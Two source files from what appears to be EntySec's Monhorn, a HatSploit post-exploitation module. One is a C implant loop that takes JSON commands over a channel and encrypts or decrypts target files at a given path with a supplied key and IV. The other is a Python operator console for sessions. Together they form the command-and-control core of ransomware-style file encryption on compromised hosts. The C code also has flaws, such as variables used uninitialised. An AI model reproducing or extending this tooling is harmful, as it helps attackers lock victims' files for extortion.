File: src/console.c
/*
* MIT License
*
* Copyright (c) 2020-2022 EntySec
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "json.h"
#include "channel.h"
#include "monhorn.h"

void interact(int channel)
{
    while (1) {
        char *path, *key, *iv;

        char *input = read_channel(channel);
        JSONObject *json = parseJSON(input);

        char *cmd = find_json(json, "cmd");
        char *args = find_json(json, "args");
        char *token = find_json(json, "token");

        if (strcmp(cmd, "encrypt") == 0 || strcmp(cmd, "decrypt") == 0) {
            format_json(args);
            JSONObject *args_json = parseJSON(args);

            send_channel(channel, "Locating target files...\n");

            path = find_json(args_json, "path");
            key = find_json(args_json, "key");
            iv = find_json(args_json, "iv");

            send_channel(channel, "Begining crypto operations...\n");
        }

        if (strcmp(cmd, "encrypt") == 0)
            begin_encrypt(channel, path, key, iv);
        else if (strcmp(cmd, "decrypt") == 0)
            begin_decrypt(channel, path, key, iv);
        else if (strcmp(cmd, "exit") == 0) {
            send_channel(channel, token);
            break;
        }

        send_channel(channel, token);

        freeJSONFromMemory(json);
        freeJSONFromMemory(args_json);
    }
}

File: monhorn/console.py
"""
MIT License

Copyright (c) 2020-2022 EntySec

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""

from hatsploit.core.cli.badges import Badges

from hatsploit.lib.runtime import Runtime
from hatsploit.lib.session import Session
from hatsploit.lib.commands import Commands

from pex.fs import FS


class Console(Badges, Runtime, Commands, FS):
    """ Subclass of monhorn module.

    This subclass of monhorn module is intended for providing
    Monhorn main console.
    """

    prompt = '%linemonhorn%end > '

    core_commands = [
        ('exit', 'Terminate Monhorn session.'),
        ('help', 'Show available commands.'),
        ('quit', 'Stop interaction.')
    ]

    commands = {}

    def check_session(self, session: Session) -> bool:
        """ Check is session alive.

        :param Session session: session to check
        :return bool: True if session is alive
        """

        if session.channel.terminated:
            self.print_warning("Connection terminated.")
            session.close()

            return False
        return True

    def start_monhorn(self, session: Session) -> None:
        """ Start Monhorn.

        :param Session session: session to start Monhorn for
        :return None: None
        """

        commands = session.monhorn + 'commands/' + session.details['Platform'].lower()
        exists, is_dir = self.exists(commands)

        if exists and not is_dir:
            self.commands.update(
                self.load_commands(commands)
            )

        commands = session.monhorn + 'commands/generic'
        exists, is_dir = self.exists(commands)

        if exists and not is_dir:
            self.commands.update(
                self.load_commands(commands)
            )

        for command in self.commands:
            self.commands[command].session = session

    def monhorn_console(self, session: Session) -> None:
        """ Start Monhorn console.

        :param Session session: session to start Monhorn console for
        :return None: None
        """

        self.start_monhorn(session)

        if self.check_session(session):
            while True:
                result = self.catch(self.monhorn_shell, [session])
                if result is not Exception and result:
                    break

    def monhorn_shell(self, session: Session) -> bool:
        """ Start Monhorn shell.

        :param Session session: session to start Monhorn shell for
        :return bool: True if Monhorn shell completed
        """

        command = self.input_empty(self.prompt)

        if command:
            if command[0] == 'quit':
                return True

            elif command[0] == 'help':
                self.print_table("Core Commands", ('Command', 'Description'),
                                 *self.core_commands)

                self.show_commands(self.commands)

            elif command[0] == 'exit':
                session.send_command("exit")
                session.channel.terminated = True
                return True

            else:
                self.check_session(session)
                self.execute_custom_command(command, self.commands)

        return False
